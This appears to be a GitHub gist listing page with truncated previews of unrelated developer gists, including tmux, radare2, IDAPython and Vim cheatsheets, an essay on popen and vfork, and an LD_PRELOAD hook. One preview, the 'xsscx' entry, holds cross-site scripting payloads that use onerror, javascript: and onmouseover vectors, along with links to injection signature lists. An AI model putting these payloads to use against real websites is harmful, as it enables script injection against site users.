MohamedAlaa

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname

xsscx

/* Remote File Include with HTML TAGS via XSS.Cx  */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>

williballenthin

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

• analyze all: aa
• show sections: iS
• list functions: afl
• list imports: ii
• list entrypoints: ie
• seek to function: s sym.main

nicowilliams

I recently happened upon a very interesting implementation of popen() (different API, same idea) called popen-noshell using clone(2), and so I opened an issue requesting use of vfork(2) or posix_spawn() for portability. It turns out that on Linux there's an important advantage to using clone(2). I think I should capture the things I wrote there in a better place. A gist, a blog, whatever.

This is not a paper. I assume reader familiarity with fork() in particular and Unix in general, though, of course, I link to relevant wiki pages, so if the unfamiliar reader is willing to go down the rabbit hole, they should be able to come ou

apsun

/*
 * Hook main() using LD_PRELOAD, because why not?
 * Obviously, this code is not portable. Use at your own risk.
 *
 * Compile using 'gcc hax.c -o hax.so -fPIC -shared -ldl'
 * Then run your program as 'LD_PRELOAD=$PWD/hax.so ./a.out'
 */

#define _GNU_SOURCE
#include <stdio.h>

icecr4ck

IDAPython cheatsheet

Important links

• Porting IDAPython plugins to IDA 7.4
• Hex-Rays IDAPython official documentation

Basic commands

Get informations on the binary

andreafioraldi

      ___   ____  ______    __                  
     /   | / __ \/ ___/ |  / /                  
    / /| |/ / / /\__ \| | / /                   
   / ___ / /_/ /___/ /| |/ /                    
  /_/__||||||_//____/ |___/__  _____ __    _ __ 
    / ____/ /_  ___  _____/ /_/ ___// /_  (_) /_
   / /   / __ \/ _ \/ ___/ __/\__ \/ __ \/ / __/
  / /___/ / / /  __/ /__/ /_ ___/ / / / / / /_  
  \____/_/ /_/\___/\___/\__//____/_/ /_/_/\__/  

Pai-Po

IDAPython cheatsheet

Important links

• Porting IDAPython plugins to IDA 7.4
• Hex-Rays IDAPython official documentation

Basic commands

Get informations on the binary

mahemoff

Vim has a Terminal Mode!

Since v8.1 (May 2018), Vim has shipped with a built-in terminal. See https://vimhelp.org/terminal.txt.html or type :help terminal for more info.

Why use this? Mainly because it saves you jumping to a separate terminal window. You can also use Vim commands to manipulate a shell session and easily transfer clipboard content between the terminal and files you're working on.

Key Bindings

brainfucksec

/*********************************************************************
*
* Name: user.js | brainfucksec
* Descr.: Mozilla Firefox configuration file: `user.js`
* Version: 0.25.0 (tested on Firefox 146.0.1)
* Date: 2026-01-02
* URL: https://gist.github.com/brainfucksec/68e79da1c965aeaa4782914afd8f7fa2
* Maintainer: brainf+ck
*
* Info: